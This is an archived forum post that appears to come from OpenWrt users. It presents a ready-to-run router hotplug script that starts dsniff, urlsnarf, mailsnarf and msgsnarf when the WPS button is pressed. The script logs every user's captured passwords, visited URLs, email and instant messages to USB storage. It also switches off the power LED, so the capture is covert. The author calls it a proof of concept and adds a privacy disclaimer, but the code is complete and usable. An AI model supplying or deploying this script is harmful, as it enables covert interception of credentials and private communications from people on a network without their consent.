OpenWrt Forum Archive

I was looking at an old Netgear router firmware I have here, the WGR614v7 and I noticed there was a log kept of which websites had been visited that could be accessed in the web administration. I wanted to see how difficult it would be to duplicate that function for my WNDR3700 OpenWRT build using dsniff. It turns out it is trivial and the script I came up with does even more.

1. Takes variables for the mountpoint of your USB storage and the network or interface you wish to monitor.
2. Is activated when the WPS button is pressed so long as the USB storage is mounted and the network interface specified exists (you can also use bridged interfaces such as br-lan).
3. When the WPS button is pressed the power LED goes out and a directory is created called dragnet on the root of your USB storage. Inside there are 4 files... passwords, url , mail , messages.
4. If the WPS button is pressed again the unit reboots.

passwords of numerous protocols, any URL visited, email - pop, smtp or imap and instant messages are recorded respectively. SSL covered communications are not harvested. In this version.

So there it is. At the touch of a button. But please do not use this to invade peoples privacy. Its a proof of concept for those wanting to see how such a system might work. As far as performance penalty, hardly noticeable for web pages, significant for http downloads, and none existent for torrents.

The dsniff package must be installed for this to operate.

/etc/hotplug.d/button/50-dragnet

#!/bin/sh 

TARGET=br-iwn
MNT_POINT=/usb

if [ "$BUTTON" = "BTN_1" ] && [ "$ACTION" = "pressed" ]; then
    if [ -e /tmp/dragnet ]; then
        logger "dragnet down, rebooting"
        reboot
    else    
if [ `mount | grep -c "on $MNT_POINT"` = 0 -o `ifconfig | grep -c $TARGET` = 0 ]; then
    logger "unable to activate dragnet because USB storage device is not mounted and/or target network is unavailable"
else
    # dragnet action here
    logger "dragnet activated on $TARGET"
    echo "$TARGET" > /tmp/dragnet
    echo "0" > /sys/devices/platform/leds-gpio/leds/wndr3700:green:power/brightness
    mkdir -p $MNT_POINT/dragnet/$TARGET
    dsniff -i $TARGET -m >> $MNT_POINT/dragnet/$TARGET/passwords & urlsnarf -i $TARGET >> $MNT_POINT/dragnet/$TARGET/url & mailsnarf -i $TARGET >> $MNT_POINT/dragnet/$TARGET/mail & msgsnarf -i $TARGET >> $MNT_POINT/dragnet/$TARGET/message &
fi
    fi
fi